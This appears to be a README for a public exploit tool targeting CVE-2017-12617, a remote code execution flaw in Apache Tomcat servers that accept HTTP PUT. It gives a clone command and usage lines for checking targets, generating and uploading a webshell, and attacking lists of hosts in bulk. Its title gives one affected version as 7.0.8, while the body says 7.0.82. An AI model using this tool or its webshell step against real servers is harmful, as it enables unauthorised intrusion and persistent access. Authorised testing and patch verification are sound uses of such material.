CVE-2017-12617: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
CVE-2017-12617
CVE-2017-12617 is a critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat. Systems with HTTP PUTs enabled (by setting the "readonly" initialization parameter of the Default servlet to "false") are affected. Tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous remote code execution (RCE) vulnerability on all operating systems if the default servlet is configured with the parameter readonly set to false, or the WebDAV servlet is enabled with the parameter readonly set to false.
Download
git clone https://github.com/cyberheartmi9/CVE-2017-12617.git
Usage
./cve-2017-12617.py [options]
options:
-u, --url  [::] check whether the target URL is vulnerable
-p, --pwn  [::] generate a webshell and upload it
-l, --list [::] hosts list
[+] usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 --pwn pwn
./cve-2017-12617.py -l hosts.txt
./cve-2017-12617.py --list hosts.txt